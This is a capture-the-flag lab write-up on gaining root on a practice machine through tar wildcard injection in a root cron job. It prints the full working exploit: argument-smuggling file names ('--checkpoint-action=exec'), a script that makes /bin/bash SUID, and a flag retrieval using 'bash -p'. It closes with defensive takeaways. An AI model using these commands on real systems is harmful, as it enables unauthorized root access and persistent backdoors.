Library-V2 - root
192.168.252.137hack10{...}๐ Challenge Objective
Following the initial user compromise of the machine 192.168.252.137 as the user librarian, the objective is to enumerate system configurations to find a privilege escalation vector, gain root access, and retrieve the final root flag.
<br>
๐ Methodology
#### 1. Challenge Overview
Having already acquired the credentials for the librarian user (Shhh!KeepQuiet), we return to the system to escalate privileges. This involves analyzing sudo privileges, SUID binaries, and automated cron jobs to find a vulnerable elevated process that can be exploited.
#### 2. Initial Reconnaissance
We started by authenticating via SSH as librarian and searching for low-hanging fruit such as sudo permissions and cron jobs. While sudo was not permitted, examining /etc/crontab revealed an interesting root cron job executing every minute.
1$ cat << 'EOF' > enum2.sh2sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 "find / -perm -4000 -type f 2>/dev/null > /tmp/suids; cat /etc/crontab > /tmp/crons; cat /tmp/suids; echo '==='; cat /tmp/crons"3EOF4$ bash enum2.sh5/usr/lib/openssh/ssh-keysign6/usr/lib/dbus-1.0/dbus-daemon-launch-helper7/usr/bin/su8/usr/bin/chsh9/usr/bin/newgrp10/usr/bin/passwd11...12===13# /etc/crontab: system-wide crontab14...15* * * * * root /root/backup.sh#### 3. Analysis / Forensics Path
The cron job pointed to /root/backup.sh. Since we could not read the script directly due to permissions, we looked for recently modified backup files to infer its behavior. We discovered an updated books.tar inside /var/backups/.
1$ sshpass -p 'Shhh!KeepQuiet' ssh librarian@192.168.252.137 "ls -la /var/backups/books.tar"23-rw-r--r-- 1 root root 10240 Mar 27 21:18 /var/backups/books.tarThe tar archive contains files from the /home/librarian/books directory, which is writable by our user.
Because the system runs a scheduled tar command on a directory we control, it strongly hints that the cron job executes something like cd /home/librarian/books \&\& tar cf /var/backups/books.tar *. This creates an opportunity for Tar Wildcard Injection, where creating files with specific flags (like --checkpoint=1) causes the tar command to interpret them as arguments instead of file names.
#### 4. Exploitation / Recovery
Using the tar wildcard injection vulnerability, we injected arbitrary command arguments that forced tar to execute a shell script as root. We created a script named root.sh that sets the SUID bit on the /bin/bash binary, and then passed it to tar via the --checkpoint-action=exec argument.
Solver Script Chain:
1# Create the payload files inside the targeted backup directory2$ cat << 'EOF' > exploit.sh3sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 << 'SSH_EOF'4cd /home/librarian/books5echo "" > "--checkpoint=1"6echo "" > "--checkpoint-action=exec=sh root.sh"7echo '#!/bin/sh' > root.sh8echo 'chmod +s /bin/bash' >> root.sh9chmod +x root.sh10SSH_EOF11EOF12$ bash exploit.shAfter waiting a minute for the cron job to execute our injected arguments, we verified that /bin/bash was successfully set to SUID root (-rwsr-xr-x).
1$ sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 "ls -la /bin/bash"23-rwsr-xr-x 1 root root 1396520 Mar 14 2024 /bin/bashWith a SUID bash binary available, we spawned a privileged shell with the -p parameter to retrieve the root flag:
1$ sshpass -p 'Shhh!KeepQuiet' ssh -o StrictHostKeyChecking=no librarian@192.168.252.137 "/bin/bash -p -c 'cat /root/root.txt'"2aGFjazEwe2NyMG5fdDRyX3cxbGRjNHJkXzFuajNjdDEwbl9mdHd9Cg==3$ echo "aGFjazEwe2NyMG5fdDRyX3cxbGRjNHJkXzFuajNjdDEwbl9mdHd9Cg==" | base64 -d4hack10{cr0n_t4r_w1ldc4rd_1nj3ct10n_ftw}#### 5. Flag
#### 6. Summary of Approach \& Key Takeaways
Methodology: We enumerated system cron jobs and discovered a restricted /root/backup.sh script that was archiving the /home/librarian/books folder using a wildcard (*). By creating maliciously named files (--checkpoint=1 and --checkpoint-action=exec=sh root.sh) inside that directory, we tricked the tar application into executing an arbitrary script as root. This script made /bin/bash an SUID binary, which gave us a persistent backdoor to retrieve the root flag.
Key Takeaways:
Using shell wildcards (like *) in bash scripts without strict path definitions (like ./*) is highly dangerous, particularly for commands like tar or chown that accept parameter flags directly.
Cron jobs running as root manipulating user-controlled directories are a very frequent vector for Local Privilege Escalation (LPE).
#
#
Web Exploitation Category
===